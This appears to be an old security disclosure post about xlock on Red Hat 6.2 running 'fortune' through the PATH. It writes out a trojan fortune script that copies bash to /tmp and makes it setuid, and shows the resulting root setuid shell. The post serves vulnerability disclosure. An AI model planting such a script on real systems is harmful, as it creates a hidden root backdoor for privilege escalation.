When xlock is running, it may run the fortune command for one of its screen
savers.  The fortune program on redhat 6.2 resides in /usr/games.  By
default this is not in anybodies $PATH.  When xlock tries to run fortune it
normally prints "sh: fortune: command not found".  To test a theory I
created a file in /bin called fortune.  It included the following.

[root@inflammation /bin]# cat fortune 
cp /bin/bash /tmp
chmod +s /tmp/bash
/usr/games/fortune

After a few times of running xlock, it ran fortune and actually ran
fortune.  I then did a ls in /tmp to see what was there and to my surprise
I have a nice setuid bash shell.

[root@inflammation /bin]# ls -l /tmp
total 488
-rwsr-sr-x    1 root     root       316848 Dec  6 11:28 bash


I realize that by default it would be hard to put such a script in any of
the standard bin paths (/bin:/usr/bin:/sbin:/usr/sbin etc).  But it may be
possible to gain elevated privledges and then overwrite another binary with
a similar script and rename it to 'fortune'.